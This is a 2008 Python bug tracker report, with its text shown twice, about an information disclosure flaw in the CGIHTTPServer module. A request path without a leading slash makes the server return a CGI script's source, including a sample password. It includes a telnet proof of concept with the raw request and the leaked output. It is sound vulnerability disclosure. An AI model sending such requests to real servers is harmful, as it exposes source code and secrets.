Message 63361 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	m.sucajtys
Recipients	m.sucajtys
Date	2008-03-07.19:59:43
SpamBayes Score	0.0086281905
Marked as misclassified	No
Message-id	<1204919985.1.0.220899639338.issue2254@psf.upfronthosting.co.za>
In-reply-to

Content
================================================================================ Summary: ================================================================================ An information disclosure flaw exists in standard python CGIHTTPServer module. Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7). ================================================================================ Description: ================================================================================ Requesting cgi script (in example test.py) without / in the beginnig of URL cause return script content/code instead of script execution. It could lead to disclose some secret information eg. password. ================================================================================ Exploit code: ================================================================================ Connected to localhost. Escape character is '^]'. GET cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 14:55:30 GMT Content-type: text/plain Content-Length: 150 Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT #!/usr/bin/env python print 'Content-Type: text/html' print 'Cache-Control: no-cache' print print 'Hello' passwd='secret' path=/opt/myapp/secretpath Connection closed by foreign host. ================================================================================ correct request: ================================================================================ Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 15:01:03 GMT Content-Type: text/html Cache-Control: no-cache Hello Connection closed by foreign host. ================================================================================

================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================

History
Date	User	Action	Args
2008-03-07 19:59:45	m.sucajtys	set	spambayes_score: 0.00862819 -> 0.0086281905 recipients: + m.sucajtys
2008-03-07 19:59:45	m.sucajtys	set	spambayes_score: 0.00862819 -> 0.00862819 messageid: <1204919985.1.0.220899639338.issue2254@psf.upfronthosting.co.za>
2008-03-07 19:59:44	m.sucajtys	link	issue2254 messages
2008-03-07 19:59:43	m.sucajtys	create